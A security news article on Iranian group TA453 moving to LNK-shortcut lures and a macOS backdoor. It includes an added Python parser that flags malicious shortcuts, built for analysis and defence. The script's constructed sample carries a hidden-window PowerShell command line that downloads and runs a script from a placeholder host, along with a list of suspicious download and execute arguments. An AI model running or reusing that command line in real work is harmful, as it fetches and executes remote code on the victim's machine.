
Iranian APT group Charming Kitten modifies strategies and utilizes Mac backdoors


The cyberespionage group known as TA453, APT42, Charming Kitten, or Mint Sandstorm, which is believed to be associated with the Iranian government, has recently altered its payload delivery tactics. The group is notorious for its sophisticated and highly targeted phishing campaigns, often impersonating researchers, journalists, and policy analysts to gain the trust of their victims. However, the group was recently observed using a different method to deliver their malware.

Instead of relying on document template injection, TA453 has begun delivering its payload through LNK files. An LNK file is a Windows shortcut: alongside the target path it stores command-line arguments, a working directory and an icon location, so a shortcut can launch powershell.exe with an attacker-chosen command line while displaying a document icon. The change most likely reflects Microsoft blocking Office macros in files downloaded from the internet by default, which removed a delivery method the group and many others had relied on.

In a recent campaign monitored by security firm Proofpoint, TA453 impersonated a senior fellow from the Royal United Services Institute (RUSI) and reached out to a media contact at a US-based think tank. They asked the contact to review a draft for an upcoming paper on Iran’s global security context. To lend credibility to their request, the attackers even introduced three other experts from the institute who were supposedly working on the project. When they didn’t receive an immediate response, they followed up using one of these three personas to reinforce their request.

The email sent to the target contained a link to a Google Apps Script macro, which redirected the victim to a Dropbox URL hosting a password-protected RAR archive. Inside the archive was a file called “Abraham Accords & MENA.pdf.lnk”: an LNK file disguised as a PDF. Explorer never displays the .lnk extension of a shortcut, even when hiding known extensions is turned off, so the victim sees “Abraham Accords & MENA.pdf” with whatever icon the shortcut specifies. Opening it ran a PowerShell payload that downloaded further stages from a cloud hosting provider.
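The following Python script is an added example for this article, not tooling from Proofpoint or code from the campaign. It shows what an analyst can pull out of a shortcut like the one above before anyone double-clicks it: it parses the MS-SHLLINK header and the StringData fields (relative path, arguments, icon location) and flags the traits described in the two paragraphs above, namely a double extension, a script-host target, hidden-window or download arguments, and an icon borrowed from a different program. Because no real sample can be embedded, the script builds its own shortcut in memory; the PowerShell command line, the download URL and the icon path are constructed placeholders, not indicators from the report.

```python
"""Shortcut (.lnk) string-data parser plus a triage pass for document lures.

Added example for this article, not tooling from Proofpoint or TA453. It
builds a constructed .lnk in memory (no real sample is embedded), parses the
MS-SHLLINK header and StringData fields, and flags the traits of a lure.
"""
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
# StringData fields appear in this fixed order, each gated by its LinkFlags bit
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))

SCRIPT_HOSTS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript", "rundll32")
SUSPICIOUS_ARGS = ("-w hidden", "-windowstyle hidden", "-ep bypass", "-executionpolicy bypass",
                   "-enc", "iwr", "invoke-webrequest", "downloadstring", "iex", "invoke-expression")
DOCUMENT_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png")


def build_lnk(**strings):
    """Construct a minimal Unicode shortcut: 76-byte header + StringData only."""
    flags = IS_UNICODE
    for bit, name in STRING_FIELDS:
        if strings.get(name) is not None:
            flags |= bit
    # HeaderSize, LinkCLSID, then LinkFlags, FileAttributes, 3 x FILETIME,
    # FileSize, IconIndex, ShowCommand (7 = SW_SHOWMINNOACTIVE, the console
    # window stays minimised), HotKey, Reserved1, Reserved2, Reserved3
    header = struct.pack("<I", 0x4C) + LNK_CLSID
    header += struct.pack("<IIQQQIiIHHII", flags, 0, 0, 0, 0, 0, 0, 7, 0, 0, 0, 0)
    body = b""
    for bit, name in STRING_FIELDS:
        if flags & bit:  # CountCharacters (uint16) followed by UTF-16LE text, no terminator
            body += struct.pack("<H", len(strings[name])) + strings[name].encode("utf-16-le")
    return header + body


def parse_lnk(data):
    """Return LinkFlags and the StringData fields of a shell link file."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:   # skip IDListSize + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:             # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    link = {"flags": flags}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # characters, not bytes
        pos += 2
        if flags & IS_UNICODE:
            link[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            link[name] = data[pos:pos + count].decode("cp1252", errors="replace")
            pos += count
    return link


def triage_lnk(filename, data):
    """Return the reasons a shortcut looks like a document lure (empty if none)."""
    link = parse_lnk(data)
    target = link.get("relative_path", "").lower()
    args = link.get("arguments", "").lower()
    icon = link.get("icon_location", "").lower()
    findings = []
    lower = filename.lower()
    if lower.endswith(".lnk") and lower[:-4].endswith(DOCUMENT_EXTS):
        findings.append("double extension: shortcut named like a document")
    if any(host in target for host in SCRIPT_HOSTS):
        findings.append("target is a script host: " + link["relative_path"])
    hits = [s for s in SUSPICIOUS_ARGS if s in args]
    if hits:
        findings.append("suspicious arguments: " + ", ".join(hits))
    if icon and any(h in target for h in SCRIPT_HOSTS) and not any(h in icon for h in SCRIPT_HOSTS):
        findings.append("icon borrowed from another program: " + link["icon_location"])
    return findings


# Constructed sample named after the file in the campaign; the command line,
# URL and icon path are placeholders, not indicators from the report.
LURE_NAME = "Abraham Accords & MENA.pdf.lnk"
LURE = build_lnk(
    relative_path=r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    arguments=r"-w hidden -ep bypass -c iwr https://cloud.example.test/stage2.ps1 | iex",
    icon_location=r"%ProgramFiles%\Adobe\Acrobat DC\Acrobat\Acrobat.exe",
)
BENIGN_NAME = "Notes.lnk"
BENIGN = build_lnk(relative_path=r"..\Documents\Notes.txt")

if __name__ == "__main__":
    for name, blob in ((LURE_NAME, LURE), (BENIGN_NAME, BENIGN)):
        print(name, "->", triage_lnk(name, blob) or ["no findings"])
```

The parser deliberately stops after StringData: real shortcuts usually also carry a LinkTargetIDList, a LinkInfo block and ExtraData, and a lure that records its target only in the IDList (with no RelativePath) would show an empty target here. Running the script on an archive's contents before extraction to the desktop, or pointing `triage_lnk` at files pulled from a mail quarantine, is the intended use.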

The PowerShell payload includes a function named Borjol that opens an encrypted HTTPS connection to a JavaScript application hosted on a subdomain of a legitimate cloud platform. The application responds with data that the payload decrypts into a PowerShell backdoor named GorjolEcho, which establishes persistence across reboots and then waits for commands from the operators.

Notably, when the attackers realised that one of their targets was using an Apple Mac rather than Windows, they produced a macOS version of the payload. It was presented as a RUSI-branded VPN client supposedly needed to reach a shared folder; what it actually installed was NokNok, a lightweight macOS port of GorjolEcho with similar functionality and the ability to deploy additional modules.

NokNok's modules are bash scripts. They share an encryption and base64 chunking routine for exfiltration and send logs to a server controlled by TA453. The researchers have identified some modules for both GorjolEcho and NokNok, but believe further, as yet undiscovered modules extend the group's capabilities.

This development shows how TA453 keeps adapting to defensive changes. By switching to LNK files and porting its backdoor to macOS, the group demonstrates that it will experiment with new techniques whenever a defensive change such as Microsoft's macro blocking closes an old one. Practical countermeasures follow from the chain described above: treat shortcut files arriving inside archives as executables and block or quarantine them at the mail gateway, watch for powershell.exe launched from Explorer with hidden-window or download arguments, and verify unexpected requests to review documents through a channel other than the email that delivered them, particularly when the sender names real colleagues to build credibility.
